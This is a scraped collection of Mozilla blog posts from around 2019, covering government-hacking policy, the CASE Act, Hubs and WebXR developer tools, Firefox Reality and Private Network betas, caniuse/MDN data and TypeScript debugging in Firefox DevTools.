These awards are part of the NetGain Partnership, a collaboration between Mozilla, Ford Foundation, Knight Foundation, MacArthur Foundation, and the Open Society Foundation. The goal of this philanthropic collaboration is to advance the public interest in the digital age.

Also see (May 2019): Seeking Art that Explores AI, Media, and Truth

The post Examining AI’s Effect on Media and Truth appeared first on The Mozilla Blog.

Open Policy & AdvocacyGovernments should work to strengthen online security, not undermine it

On Friday, Mozilla filed comments in a case brought by Privacy International in the European Court of Human Rights involving government “computer network exploitation” (“CNE”)—or, as it is more colloquially known, government hacking.

While the case focuses on the direct privacy and freedom of expression implications of UK government hacking, Mozilla intervened in order to showcase the further, downstream risks to users and internet security inherent in state CNE. Our submission highlights the security and related privacy threats from government stockpiling and use of technology vulnerabilities and exploits.

Government CNE relies on the secret discovery or introduction of vulnerabilities—i.e., bugs in software, computers, networks, or other systems that create security weaknesses. “Exploits” are then built on top of the vulnerabilities. These exploits are essentially tools that take advantage of vulnerabilities in order to overcome the security of the software, hardware, or system for purposes of information gathering or disruption.

When such vulnerabilities are kept secret, they can’t be patched by companies, and the products containing the vulnerabilities continue to be distributed, leaving people at risk. The problem arises because no one—including government—can perfectly secure information about a vulnerability. Vulnerabilities can be and are independently discovered by third parties and inadvertently leaked or stolen from government. In these cases where companies haven’t had an opportunity to patch them before they get loose, vulnerabilities are ripe for exploitation by cybercriminals, other bad actors, and even other governments,1 putting users at immediate risk.

This isn’t a theoretical concern. For example, the findings of one study suggest that within a year, vulnerabilities undisclosed by a state intelligence agency may be rediscovered up to 15% of the time.2 Also, one of the worst cyber attacks in history was caused by a vulnerability and exploit stolen from NSA in 2017 that affected computers running Microsoft Windows.3 The devastation wreaked through use of that tool continues apace today.4

This example also shows how damaging it can be when vulnerabilities impact products that are in use by tens or hundreds of millions of people, even if the actual government exploit was only intended for use against one or a handful of targets.

As more and more of our lives are connected, governments and companies alike must commit to ensuring strong security. Yet state CNE significantly contributes to the prevalence of vulnerabilities that are ripe for exploitation by cybercriminals and other bad actors and can result in serious privacy and security risks and damage to citizens, enterprises, public services, and governments. Mozilla believes that governments can and should contribute to greater security and privacy for their citizens by minimizing their use of CNE and disclosing vulnerabilities to vendors as they find them.

2https://www.belfercenter.org/sites/default/files/files/publication/Vulnerability Rediscovery (belfer-revision).pdf

The post Governments should work to strengthen online security, not undermine it appeared first on Open Policy & Advocacy.

QMOFirefox 70 Beta 6 Testday Results

Hello Mozillians!

As you may already know,  Friday, September 13th – we held a new Testday event, for Firefox 70 Beta 6.

Thank you all for helping us make Mozilla a better place: Gabriela (gaby2300), Dan Caseley (Fishbowler) and Aishwarya Narasimhan!

Result: Several test cases were executed for Protection Report and Privacy Panel UI Updates.

Thanks for another awesome testday, we appreciate your contribution! 🙂

We hope to see you all in our next events, keep an eye on QMO.

We will make announcements as soon as something shows up!


Mozilla VR BlogCreating privacy-centric virtual spaces

Creating privacy-centric virtual spaces

We now live in a world with instantaneous communication unrestrained by geography. While a generation ago, we would be limited by the speed of the post, now we’re limited by the speed of information on the Internet. This has changed how we connect with other people.

As immersive devices become more affordable, social spaces in virtual reality (VR) will become more integrated into our daily lives and interactions with friends, family, and strangers. Social media has enabled rapid pseudonymous communication, which can be directed at both a single person and large groups. If social VR is the next evolution of this, what approaches will result in spaces that respect user identities, autonomy, and safety?

We need spaces that reflect how we interact with others on a daily basis.

Social spaces: IRL and IVR

Often, when people think about social VR, what tends to come to mind are visions from the worlds of science fiction stories: Snow Crash, Ready Player One, The Matrix - huge worlds that involve thousands of strangers interacting virtually on a day to day basis. In today’s social VR ecosystem, many applications take a similarly public approach: new users are often encouraged (or forced) by the system to interact with new people in the name of developing relationships with strangers who are also participating in the shared world. This can result in more dynamic and populated spaces, but in a way that isn’t inherently understood from our regular interactions.

This approach doesn’t mirror our usual day-to-day experiences—instead of spending time with strangers, we mostly interact with people we know. Whether we’re in a private, semi-public, or public space, we tend to stick to familiarity. We can define the privacy of space by thinking about who has access to a location, and the degree to which there is established trust among other people you encounter there.

Private: a controlled space where all individuals are known to each other. In the physical world, your home is an example of a private space—you know anyone invited into your home, whether they’re a close associate, or a passing acquaintance (like a plumber)
Semi-public: a semi-controlled space where all individuals are associated with each other. For example, you might not know everyone in your workplace, but you’re all connected via your employer
Public: a public space made up of a lot of different, separate groups of people who might not have established relationships or connections. In a restaurant, while you know the group you’re dining with, you likely don’t know anyone else

Creating privacy-centric virtual spaces

While we might encounter strangers in public or semi-public spaces, most of our interactions are still with people we know. This should extend to the virtual world. However, VR devices haven’t been widely available until recently, so most companies building virtual worlds have designed their spaces in a way that prioritizes getting people in the same space, regardless of whether or not those users already know each other.

For many social VR systems, the platform hosting spaces often networks different environments and worlds together and provides a centralized directory of user-created content to go explore. While this type of discovery has benefits and values, in the physical world, we largely spend time with the same people from day to day. Why don’t we design a social platform around this?

Mozilla Hubs is a social VR platform created to provide spaces that more accurately emulate our IRL interactions. Instead of hosting a connected, open ecosystem, users create their own independent, private-by-default rooms. This creates a world where instead of wandering into others’ spaces, you intentionally invite people you know into your space.

Private by default

Communities and societies often establish their own cultural norms, signals, inside jokes, and unspoken (or written) rules — these carry over to online spaces. It can be difficult for people to be thrown into brand-new groups of users without this understanding, and there are often no guarantees that the people you’ll be interacting with in these public spaces will be receptive to other users who are joining. In contrast to these public-first platforms, we’ve designed our social VR platform, Hubs, to be private by default. This means that instead of being in an environment with strangers from the outset, Hubs rooms are designed to be private to the room owner, who can then choose who they invite into the space with the room access link.

Protecting public spaces

When we’re in public spaces, we have different sets of implied rules than the social norms that we might abide by when we’re in private. In virtual spaces, these rules aren’t always as clear and different people will behave differently in the absence of established rules or expectations. Hubs allows communities to set up their own public spaces, so that they can bring their own social norms into the spaces. When people are meeting virtually, it’s important to consider the types of interactions that you’re encouraging.

Because access to a Hubs room is predicated on having the invitation URL, the degree to which that link is shared by the room owner or visitors to the room will dictate how public or private a space is. If you know that the only people in a Hubs room are you and two of your closest friends, you probably have a pretty good sense of how the three of you interact together. If you’re hosting a meetup and expecting a crowd, those behaviors can be less clear. Without intentional community management practices, virtual spaces can turn ugly. Here are some things that you could consider to keep semi-public or public Hubs rooms safe and welcoming:

  • Keep the distribution of the Hubs link limited to known groups of trusted individuals and consider using a form or registration to handle larger events.
  • Use an integration like the Hubs Discord Bot to back users against a known identity. Removing users from a linked Discord channel also removes their ability to enter an authenticated Hubs room.
  • Lock down room permissions in the room to limit who can create new objects in the room or draw with the pen tool.
  • Create a code of conduct or set of community guidelines that are posted in the Hubs room near the room entry point.
  • Assign trusted users to act as moderators so users who is available in the space to help welcome visitors and enforce positive conduct.

We need social spaces that respect and empower participants. Here at Mozilla, we’re creating a platform that more closely reflects how we interact with others IRL. Our spaces are private by default, and Hubs allows users to control who enters their space and how visitors can behave.

Mozilla Hubs is an open source social VR platform—come try it out at hubs.mozilla.com or contribute here.

Read more about safety and identity in Hubs here.

Mozilla VR BlogMultiview on WebXR

Multiview on WebXR

The WebGL multiview extension is already available in several browsers and 3D web engines and it could easily help to improve the performance on your WebXR application

What is multiview?

When VR first arrived, many engines supported stereo rendering by running all the render stages twice, one for each camera/eye. While it works it is highly inefficient.

for (eye in eyes)

Where renderScene will setup the viewport, shaders, and states every time is being called. This will double the cost of rendering every frame.

Later on, some optimizations started to appear in order to improve the performance and minimize the state changes.

for (object in scene) 
	for (eye in eyes)
		renderObject(object, eye)

Even if we reduce the number of state changes, by switching programs and grouping objects, the number of draw calls remains the same: two times the number of objects.

In order to minimize this bottleneck, the multiview extension was created. The TL;DR of this extension is: Using just one drawcall you can draw on multiple targets, reducing the overhead per view.

Multiview on WebXR

This is done by modifying your shader uniforms with the information for each view and accessing them with the gl_ViewID_OVR, similar to how the Instancing API works.

in vec4 inPos;
uniform mat4 u_viewMatrices[2];
void main() {
    gl_Position = u_viewMatrices[gl_ViewID_OVR] * inPos;

The resulting render loop with the multiview extension will look like:

for (object in scene)
    setUniformsForBothEyes() // Left/Right camera matrices

This extension can be used to improve multiple tasks as cascaded shadow maps, rendering cubemaps, rendering multiple viewports as in CAD software, although the most common use case is stereo rendering.

Stereo rendering is also our main target as this will improve the VR rendering path performance with just a few modifications in a 3D engine. Currently, most of the headsets have two views, but there are prototypes of headset with ultra-wide FOV using 4 views which is currently the maximum number of views supported by multiview.

Multiview in WebGL

Once the OpenGL OVR_multiview2 specification was created, the WebGL working group started to make a WebGL version of this API.

It’s been a while since our first experiment supporting multiview on servo and three.js. Back then it was quite a challenge to support WEBGL_multiview: it was based on opaque framebuffers and it was possible to use it with WebGL1 but the shaders need to be compiled with GLSL 3.0 support, which was only available on WebGL2, so some hacks on the servo side were needed in order to get it running.
At that time the WebVR spec had a proposal to support multiview but it was not approved.

Thanks to the work of the WebGL WG, the multiview situation has improved a lot in the last few months. The specification is already in the Community Approved status, which means that browsers could ship it enabled by default (As we do on Firefox desktop 70 and Firefox Reality 1.4)

Some important restrictions of the final specification to notice:

  • It only supports WebGL2 contexts, as it needs GLSL 3.00 and texture arrays.
  • Currently there is no way to use multiview to render to a multisampled backbuffer, so you should create contexts with antialias: false. (The WebGL WG is working on a solution for this)

Web engines with multiview support

We have been working for a while on adding multiview support to three.js (PR). Currently it is possible to get the benefits of multiview automatically as long as the extension is available and you define a WebGL2 context without antialias:

var context = canvas.getContext( 'webgl2', { antialias: false } );
renderer = new THREE.WebGLRenderer( { canvas: canvas, context: context } );

You can see a three.js example using multiview here (source code).

A-Frame is based on three.js so they should get multiview support as soon as they update to the latest release.

Babylon.js has had support for OVR_multiview2 already for a while (more info).

For details on how to use multiview directly without using any third party engine, you could take a look at the three.js implementation, see the specification’ sample code or read this tutorial by Oculus.

Browsers with multiview support

The extension was just approved by the Community recently so we expect to see all the major browsers adding support for it by default soon

  • Firefox Desktop: Firefox 71 will support multiview enabled by default. In the meantime, you can test it on Firefox Nightly by enabling draft extensions.
  • Firefox Reality: It’s already enabled by default since version 1.3.
  • Oculus Browser: It’s implemented but disabled by default, you must enable Draft WebGL Extension preference in order to use it.
  • Chrome: You can use it on Chrome Canary for Windows by running it with the following command line parameters: --use-cmd-decoder=passthrough --enable-webgl-draft-extensions

Performance improvements

Most WebGL or WebXR applications are CPU bound, the more objects you have on the scene the more draw calls you will submit to the GPU. In our benchmarks for stereo rendering with two views, we got a consistent improvement of ~40% compared to traditional rendering.
As you can see on the following chart, the more cubes (drawcalls) you have to render, the better the performance will be.
Multiview on WebXR

What’s next?

The main drawback when using the current multiview extension is that there is no way to render to a multisampling backbuffer. In order to use it with WebXR you should set antialias: false when creating the context. However this is something the WebGL WG is working on.

As soon as they come up with a proposal and is implemented by the browsers, 3D engines should support it automatically. Hopefully, we will see new extensions arriving to the WebGL and WebXR ecosystem to improve the performance and quality of the rendering, such as the ones exposed by Nvidia VRWorks (eg: Variable Rate Shading and Lens Matched Shading).



* Header image by Nvidia VRWorks

Mozilla VR BlogFirefox Reality 1.4

Firefox Reality 1.4

Firefox Reality 1.4 is now available for users in the Viveport and Oculus stores.

With this release, we’re excited to announce that users can enjoy browsing in multiple windows side-by-side. Each window can be set to the size and position of your choice, for a super customizable experience.

Firefox Reality 1.4

And, by popular demand, we’ve enabled local browsing history, so you can get back to sites you've visited before without typing. Sites in your history will also appear as you type in the search bar, so you can complete the address quickly and easily. You can clear your history or turn it off anytime from within Settings.

The Content Feed also has a new and improved menu of hand-curated “Best of WebVR” content for you to explore. You can look forward to monthly updates featuring a selection of new content across different categories including Animation, Extreme (sports/adrenaline/adventure), Music, Art & Experimental and our personal favorite way to wind down a day, 360 Chill.

Additional highlights

  • Movable keyboard, so you can place it where it’s most comfortable to type.
  • Tooltips on buttons and actions throughout the app.
  • Updated look and feel for the Bookmarks and History views so you can see and interact better at all window sizes.
  • An easy way to request the desktop version of a site that doesn’t display well in VR, right from the search bar.
  • Updated and reorganized settings to be easier to find and understand.
  • Added the ability to set a preferred website language order.

Full release notes can be found in our GitHub repo here.

Stay tuned as we keep improving Firefox Reality! We’re currently working on integrating your Firefox Account so you’ll be able to easily send tabs to and from VR from other devices. New languages and copy/paste are also coming soon, in addition to continued improvements in performance and stability.

Firefox Reality is available right now. Go and get it!
Download for Oculus Go
Download for Oculus Quest
Download for Viveport (Search for Firefox Reality in Viveport store)

Mozilla VR BlogWebXR emulator extension

WebXR emulator extension

We are happy to announce the release of our WebXR emulator browser extension which helps WebXR content creation.

We understand that developing and debugging WebXR experiences is hard for many reasons:

  • You must own a physical XR device
  • Lack of support of XR devices on some platforms, as macOS
  • Putting on and taking off the headset all the time is an uncomfortable task
  • In order to make your app responsive across form factors, you must own tons of devices: mobile, tethered, 3dof, 6dof, and so on

With this extension, we aim to soften most of these issues.

WebXR emulator extension emulates XR devices so that you can directly enter immersive(VR) mode from your desktop browser and test your WebXR application without the need of any XR devices. It emulates multiple XR devices, so you can select which one you want to test.

The extension is built on top of the WebExtensions API, so it works on Firefox, Chrome, and other browsers supporting the API.

WebXR emulator extension

How can I use it?

  1. Install the extension from the extension stores (Firefox, Chrome)
  2. Launch a WebXR application, for example the Three.js examples. You will notice that the application detects that you have a VR device (emulated) and it will let you enter the immersive (VR) mode.
  3. Open the “WebXR” tab in the browser’s developer tool (Firefox, Chrome) to control the emulated device. You can move the headset and controllers and trigger the controller buttons. You will see their transforms reflected in the WebXR application.
    WebXR emulator extension

What’s next?

The development of this extension is still at an early stage. We have many awesome features planned, including:

  • Recording and replaying of actions and movements of your XR devices so you don’t have to replicate them every time you want to test your app and can share them with others.
  • Incorporate new XR devices
  • Control the headset and controllers using a standard gamepad like the Xbox or PS4 controllers or use your mobile as 3dof device
  • Something else?

We would love your feedback! What new features do you want next? Any problems with the extension on your WebXR application? Please join us on GitHub to discuss them.

Lastly, we would like to give a shout out to the WebVR API emulation Extension by Jaume Sanchez as it was a true inspiration for us when building this one.

Open Policy & AdvocacyCASE Act Threatens User Rights in the United States

This week, the House Judiciary Committee is expected to mark up the Copyright Alternative in Small Claims Enforcement (CASE) Act of 2019 (H.R. 2426). While the bill is designed to streamline the litigation process, it will impose severe costs upon users and the broader internet ecosystem. More specifically, the legislation would create a new administrative tribunal for claims with limited legal recourse for users, incentivizing copyright trolling and violating constitutional principles. Mozilla has always worked for copyright reform that supports businesses and internet users, and we believe that the CASE Act will stunt innovation and chill free expression online. With this in mind, we urge members to oppose passage of H.R. 2426.

First, the tribunal created by the legislation conflicts with well-established separation of powers principles and limits due process for potential defendants. Under the CASE Act, a new administrative board would be created within the Copyright Office to review claims of infringement. However, as Professor Pamela Samuelson and Kathryn Hashimoto of Berkeley Law point out, it is not clear that Congress has the authority under Article I of the Constitution to create this tribunal. Although Congress can create tribunals that adjudicate “public rights” matters between the government and others, the creation of a board to decide infringement disputes between two private parties would represent an overextension of its authority into an area traditionally governed by independent Article III courts.

Moreover, defendants subject to claims under the CASE Act will be funneled into this process with strictly limited avenues for appeal. The legislation establishes the tribunal as a default legal process for infringement claims–defendants will be forced into the process unless they explicitly opt-out. This implicitly places the burden on the user, and creates a more coercive model that will disadvantage defendants who are unfamiliar with the nuances of this new legal system. And if users have objections to the decision issued by the tribunal, the legislation severely restricts access to justice by limiting substantive court appeals to cases in which the board exceeded its authority; failed to render a final determination; or issued a determination as a result of fraud, corruption, or other misconduct.

While the board is supposed to be reserved for small claims, the tribunal is authorized to award damages of up to $30,000 per proceeding. For many people, this supposedly “small” amount would be enough to completely wipe out their household savings. Since the forum allows for statutory damages to be imposed, the plaintiff does not even have to show any actual harm before imposing potentially ruinous costs on the defendant.

These damages awards are completely out of place in what is being touted as a small claims tribunal. As Stan Adams of the Center for Democracy and Technology notes, awards as high as $30,000 exceed the maximum awards for small claims courts in 49 out of 50 states. In some cases, they would be ten times higher than the damages available in small claims court.

The bill also authorizes the Register of Copyrights to unilaterally establish a forum for claims of up to $5,000 to be decided by a singular Copyright Claims Officer, without any pre-established explicit due process protections for users. These amounts may seem negligible in the context of a copyright suit, where damages can reach up to $150,000, but nearly 40 percent of Americans cannot cover a $400 emergency today.

Finally, the CASE Act will give copyright trolls a favorable forum. In recent years, some unscrupulous actors made a business of threatening thousands of Internet users with copyright infringement suits. These suits are often based on flimsy, but potentially embarrassing, allegations of infringement of pornographic works. Courts have helped limit the worst impact of these campaigns by making sure the copyright owner presented evidence of a viable case before issuing subpoenas to identify Internet users. But the CASE Act will allow the Copyright Office to issue subpoenas with little to no process, potentially creating a cheap and easy way for copyright trolls to identify targets.

Ultimately, the CASE Act will create new problems for internet users and exacerbate existing challenges in the legal system. For these reasons, we ask members to oppose H.R. 2426.

The post CASE Act Threatens User Rights in the United States appeared first on Open Policy & Advocacy.

The Mozilla BlogFirefox’s Test Pilot Program Returns with Firefox Private Network Beta

Like a cat, the Test Pilot program has had many lives. It originally started as an Add-on before we relaunched it three years ago. Then in January, we announced that we were evolving our culture of experimentation, and as a result we closed the Test Pilot program to give us time to further explore what was next.

We learned a lot from the Test Pilot program. First, we had a loyal group of users who provided us feedback on projects that weren’t polished or ready for general consumption. Based on that input we refined and revamped various features and services, and in some cases shelved projects altogether because they didn’t meet the needs of our users. The feedback we received helped us evaluate a variety of potential Firefox features, some of which are in the Firefox browser today.

If you haven’t heard, third time’s the charm. We’re turning to our loyal and faithful users, specifically the ones who signed up for a Firefox account and opted-in to be in the know about new products testing, and are giving them a first crack to test-drive new, privacy-centric products as part of the relaunched Test Pilot program. The difference with the newly relaunched Test Pilot program is that these products and services may be outside the Firefox browser, and will be far more polished, and just one step shy of general public release.

We’ve already earmarked a couple of new products that we plan to fine-tune before their official release as part of the relaunched Test Pilot program. Because of how much we learned from our users through the Test Pilot program, and our ongoing commitment to build our products and services to meet people’s online needs, we’re kicking off our relaunch of the Test Pilot program by beta testing our project code named Firefox Private Network.

Try our first beta – Firefox Private Network

One of the key learnings from recent events is that there is growing demand for privacy features. The Firefox Private Network is an extension which provides a secure, encrypted path to the web to protect your connection and your personal information anywhere and everywhere you use your Firefox browser.

There are many ways that your personal information and data are exposed: online threats are everywhere, whether it’s through phishing emails or data breaches. You may often find yourself taking advantage of the free WiFi at the doctor’s office, airport or a cafe. There can be dozens of people using the same network — casually checking the web and getting social media updates. This leaves your personal information vulnerable to those who may be lurking, waiting to take advantage of this situation to gain access to your personal info. Using the Firefox Private Network helps protect you from hackers lurking in plain sight on public connections.

Start testing the Firefox Private Network today, it’s currently available in the US on the Firefox desktop browser. A Firefox account allows you to be one of the first to test potential new products and services, you can sign up directly from the extension.


Key features of Firefox Private Network are:

  • Protection when in public WiFi access points – Whether you are waiting at your doctor’s office, the airport or working from your favorite coffee shop, your connection to the internet is protected when you use the Firefox browser thanks to a secure tunnel to the web, protecting all your sensitive information like the web addresses you visit, personal and financial information.
  • Internet Protocol (IP) addresses are hidden so it’s harder to track you – Your IP address is like a home address for your computer. One of the reasons why you may want to keep it hidden is to keep advertising networks from tracking your browsing history. Firefox Private Network will mask your IP address providing protection from third party trackers around the web.
  • Toggle the switch on at any time. By clicking in the browser extension, you will find an on/off toggle that shows you whether you are currently protected, which you can turn on at anytime if you’d like additional privacy protection, or off if not needed at that moment.

Your feedback on Firefox Private Network beta is important

Over the next several months you will see a number of variations on our testing of the Firefox Private Network. This iterative process will give us much-needed feedback to explore technical and possible pricing options for the different online needs that the Firefox Private Network meets.

Your feedback will be essential in making sure that we offer a full complement of services that address the problems you face online with the right-priced service solutions. We depend on your feedback and we will send a survey to follow up. We hope you can spend a few minutes to complete it and let us know what you think. Please note this first Firefox Private Network Beta test will only be available to start in the United States for Firefox account holders using desktop devices. We’ll keep you updated on our eventual beta test roll-outs in other locales and platforms.

Sign up now for a Firefox account and join the fight to keep the internet open and accessible to all.

The post Firefox’s Test Pilot Program Returns with Firefox Private Network Beta appeared first on The Mozilla Blog.

hacks.mozilla.orgCaniuse and MDN compatibility data collaboration

Web developers spend a good amount of time making web compatibility decisions. Deciding whether or not to use a web platform feature often depends on its availability in web browsers.

A brief history of compatibility data

More than 10 years ago, @fyrd created the caniuse project, to help developers check feature availability across browsers. Over time, caniuse has evolved into the go-to resource to answer the question that comes up day to day: “Can I use this?”

About 2 years ago, the MDN team started re-doing its browser compatibility tables. The team was on a mission to take the guesswork out of web compatibility. Since then, the BCD project has become a large dataset with more than 10,000 data points. It stays up to date with the help of over 500 contributors on GitHub.

MDN compatibility data is available as open data on npm and has been integrated in a variety of projects including VS Code and webhint.io auditing.

Two great data sources come together

Today we’re announcing the integration of MDN’s compat data into the caniuse website. Together, we’re bringing even more web compatibility information into the hands of web developers.

Caniuse table for Intl.RelativeTimeFormat. Data imported from mdn-compat-data.

Before we began our collaboration, the caniuse website only displayed results for features available in the caniuse database. Now all search results can include support tables for MDN compat data. This includes data types already found on caniuse, specifically the HTML, CSS, JavaScript, Web API, SVG & and HTTP categories. By adding MDN data, the caniuse support table count expands from roughly 500 to 10,500 tables! Developers’ caniuse queries on what’s supported where will now have significantly more results.

The new feature tables will look a little different. Because the MDN compat data project and caniuse have compatible yet somewhat different goals, the implementation is a little different too. While the new MDN-based tables don’t have matching fields for all the available metadata (such as links to resources and a full feature description), support notes and details such as bug information, prefixes, feature flags, etc. will be included.

The MDN compatibility data itself is converted under the hood to the same format used in caniuse compat tables. Thus, users can filter and arrange MDN-based data tables in the same way as any other caniuse table. This includes access to browser usage information, either by region or imported through Google Analytics to help you decide when a feature has enough support for your users. And the different view modes available via both datasets help visualize support information.

Differences in the datasets

We’ve been asked why the datasets are treated differently. Why didn’t we merge them in the first place? We discussed and considered this option. However, due to the intrinsic differences between our two projects, we decided not to. Here’s why:

MDN’s support data is very broad and covers feature support at a very granular level. This allows MDN to provide as much detailed information as possible across all web technologies, supplementing the reference information provided by MDN Web Docs.

Caniuse, on the other hand, often looks at larger features as a whole (e.g. CSS Grid, WebGL, specific file format support). The caniuse approach provides developers with higher level at-a-glance information on whether the feature’s supported. Sometimes detail is missing. Each individual feature is added manually to caniuse, with a primary focus on browser support coverage rather than on feature coverage overall.

Because of these and other differences in implementation, we don’t plan on merging the source data repositories or matching the data schema at this time. Instead, the integration works by matching the search query to the feature’s description on caniuse.com. Then, caniuse generates an appropriate feature table, and converts MDN support data to the caniuse format on the fly.

What’s next

We encourage community members of both repos, caniuse and mdn-compat-data, to work together to improve the underlying data. By sharing information and collaborating wherever possible, we can help web developers find answers to compatibility questions.

The post Caniuse and MDN compatibility data collaboration appeared first on Mozilla Hacks - the Web developer blog.

Mozilla VR BlogSemantic Placement in Augmented Reality using MrEd

Semantic Placement in Augmented Reality using MrEd

In this article we’re going to take a brief look at how we may want to think about placement of objects in Augmented Reality. We're going to use our recently released lightweight AR editing tool MrEd to make this easy to demonstrate.

Designers often express ideas in a domain appropriate language. For example a designer may say “place that chair on the floor” or “hang that photo at eye level on the wall”.

However when we finalize a virtual scene in 3d we often keep only the literal or absolute XYZ position of elements and throw out the original intent - the deeper reason why an object ended up in a certain position.

It turns out that it’s worth keeping the intention - so that when AR scenes are re-created for new participants or in new physical locations that the scenes still “work” - that they still are satisfying experiences - even if some aspects change.

In a sense this recognizes the Japanese term 'Wabi-Sabi'; that aesthetic placement is always imperfect and contends between fickle forces. Describing placement in terms of semantic intent is also similar to responsive design on the web or the idea of design patterns as described by Christopher Alexander.

Let’s look at two simple examples of semantic placement in practice.

1. Relative to the Ground

When you’re placing objects in augmented reality you often want to specify that those objects should be relationally placed in a position relative to other objects. A typical, in fact ubiquitous, example of placement is that often you want an object to be positioned relative to “the ground”.

Sometimes the designer's intent is to select the highest relative surface underneath the object in question (such as placing a lamp on a table) or at other times to select the lowest relative surface underneath an object (such as say placing a kitten on the floor under a table). Often, as well, we may want to express a placement in the air - such as say a mailbox, or a bird.

In this very small example I’ve attached a ground detection script to a duck, and then sprinkled a few other passive objects around the scene. As the ground is detected the duck will pop down from a default position to be offset relative to the ground (although still in the air). See the GIF above for an example of the effect.

To try this scene out yourself you will need WebXR for iOS which is a preview of emerging WebXR standards using iOS ARKit to expose augmented reality features in a browser environment. This is the url for the scene above in play mode (on a WebXR capable device):


Here is what it should look like in edit mode:

Semantic Placement in Augmented Reality using MrEd

You can also clone the glitch and edit the scene yourself (you’ll want to remember to set a password in the .env file and then login from inside MrEd). See:


Here’s my script itself:

/// #title grounded
/// #description Stick to Floor/Ground - dynamically and constantly searching for low areas nearby
    start: function(evt) {
    tick: function(e) {
        let floor = this.sgp.getFloorNear({point:e.target.position})
        if(floor) {
            e.target.position.y = floor.y

This is relying on code baked into MrEd (specifically inside of findFloorNear() in XRWorldInfo.js if you really want to get detailed).

In the above example I begin by calling startWorldInfo() to start painting the ground planes (so that I can see them since it’s nice to have visual feedback). And, every tick, I call a floor finder subroutine which simply returns the best guess as to the floor in that area. The floor finder logic in this case is pre-defined but one could easily imagine other kinds of floor finding strategies that were more flexible.

2. Follow the player

Another common designer intent is to make sure that some content is always visible to the player. As designers in virtual or augmented reality it can be more challenging to direct a users attention to virtual objects. These are 3d immersive worlds, the player can be looking in any direction. Some kind of mechanic is needed to help make sure that the player sees what they need to see.

One common simple solution is to build an object that stays in front of the user. This can be itself a combination of multiple simpler behaviors. An object can be ordered to seek a position in front of the user, be at a certain height, and ideally billboarded so that any signage or message is always legible.

In this example a sign is decorated with two separate scripts, one to keep the sign in front of the player, and another to billboard the sign to face the player.


Closing thoughts

We’ve only scratched the surface of the kinds of intent could be expressed or combined together. If you want to dive deeper there is a longer list in a separate article Laundry List of UX Patterns). I also invite you to help extend the industry; think both about what high level intentions you mean when you place objects and also how you'd communicate those intentions.

The key insight here is that preserving semantic intent means thinking of objects as intelligent, able to respond to simple high level goals. Virtual objects are more than just statues or art at a fixed position, but can be entities that can do your bidding, and follow high level rules.

Ultimately future 3d tools will almost certainly provide these kinds of services - much in the way CSS provides layout directives. We should also expect to see conventions emerge as more designers begin to work in this space. As a call to action, it's worth it to notice the high level intentions that you want, and to get the developers of the tools that you use to start to incorporate those intentions as primitives.

hacks.mozilla.orgDebugging TypeScript in Firefox DevTools

Firefox Debugger has evolved into a fast and reliable tool chain over the past several months and it’s now supporting many cool features. Though primarily used to debug JavaScript, did you know that you can also use Firefox to debug your TypeScript applications?

Before we jump into real world examples, note that today’s browsers can’t run TypeScript code directly. It’s important to understand that TypeScript needs to be compiled into Javascript before it’s included in an HTML page.

Also, debugging TypeScript is done through a source-map, and so we need to instruct the compiler to produce a source-map for us as well.

You’ll learn the following in this post:

  • Compiling TypeScript to JavaScript
  • Generating source-map
  • Debugging TypeScript

Let’s get started with a simple TypeScript example.

TypeScript Example

The following code snippet shows a simple TypeScript hello world page.

// hello.ts
interface Person {
  firstName: string;
  lastName: string;
function hello(person: Person) {
  return "Hello, " + person.firstName + " " + person.lastName;
function sayHello() {
  let user = { firstName: "John", lastName: "Doe" };
  document.getElementById("output").innerText = hello(user);

TypeScript (TS) is very similar to JavaScript and the example should be understandable even for JS developers unfamiliar with TypeScript.

The corresponding HTML page looks like this:

// hello.html
<!DOCTYPE html>
  <script src="hello.js"></script>
  <button onclick="sayHello()">Say Hello!</button>
  <div id="output"></div>

Note that we are including the hello.js not the hello.ts file in the HTML file. Today’s browser can’t run TS directly, and so we need to compile our hello.ts file into regular JavaScript.

The rest of the HTML file should be clear. There is one button that executes the sayHello() function and <div id="output"> that is used to show the output (hello message).

Next step is to compile our TypeScript into JavaScript.

Compiling TypeScript To JavaScript

To compile TypeScript into JavaScript you need to have a TypeScript compiler installed. This can be done through NPM (Node Package Manager).

npm install -g typescript

Using the following command, we can compile our hello.ts file. It should produce a JavaScript version of the file with the *.js extension.

tsc hello.ts

In order to produce a source-map that describes the relationship between the original code (TypeScript) and the generated code (JavaScript), you need to use an additional --sourceMap argument. It generates a corresponding *.map file.

tsc hello.ts --sourceMap

Yes, it’s that simple.

You can read more about other compiler options if you are interested.

The generated JS file should look like this:

function greeter(person) {
  return "Hello, " + person.firstName + " " + person.lastName;
var user = {
  firstName: "John",
  lastName: "Doe"
function sayHello() {
  document.getElementById("output").innerText = greeter(user);
//# sourceMappingURL=hello.js.map

The most interesting thing is probably the comment at the end of the generated file. The syntax comes from old Firebug times and refers to a source map file containing all information about the original source.

Are you curious what the source map file looks like? Here it is.


It contains information (including location) about the generated file (hello.js), the original file (hello.ts), and, most importantly, mappings between those two. With this information, the debugger knows how to interpret the TypeScript code even if it doesn’t know anything about TypeScript.

The original language could be anything (RUST, C++, etc.) and with a proper source-map, the debugger knows what to do. Isn’t that magic?

We are all set now. The next step is loading our little app into the Debugger.

Debugging TypeScript

The debugging experience is no different from how you’d go about debugging standard JS. You’re actually debugging the generated JavaScript, but since source-map is available the debugger knows how to show you the original TypeScript instead.

This example is available online, so if you are running Firefox you can try it right now.

Let’s start with creating a breakpoint on line 9 in our original TypeScript file. To hit the breakpoint you just need to click on the Say Hello! button introduced earlier.

Debugging TypeScript

See, it’s TypeScript there!

Note the Call stack panel on the right side, it properly shows frames coming from hello.ts file.

One more thing: If you are interested in seeing the generated JavaScript code you can use the context menu and jump right into it.

This action should navigate you to the hello.js file and you can continue debugging from the same location.

You can see that the Sources tree (on the left side) shows both these files at the same time.

Map Scopes

Let’s take a look at another neat feature that allows inspection of variables in both original and generated scopes.

Here is a more complex glitch example.

  1. Load https://firefox-devtools-example-babel-typescript.glitch.me/
  2. Open DevTools Toolbox and select the Debugger panel
  3. Create a breakpoint in Webpack/src/index.tsx file on line 45
  4. The breakpoint should pause JS execution immediately

Screenshot of the DevTools debugger panel allowing inspection of variables in both original and generated scopes

Notice the Scopes panel on the right side. It shows variables coming from generated (and also minified) code and it doesn’t correspond to the original TSX (TypeScript with JSX) code, which is what you see in the Debugger panel.

There is a weird e variable instead of localeTime, which is actually used in the source code.

This is where the Map scopes feature comes handy. In order to see the original variables (used in the original TypeScript code) just click the Map checkbox.

Debugger panel in Firefox DevTools,using the Map checkbox to see original TypeScript variables

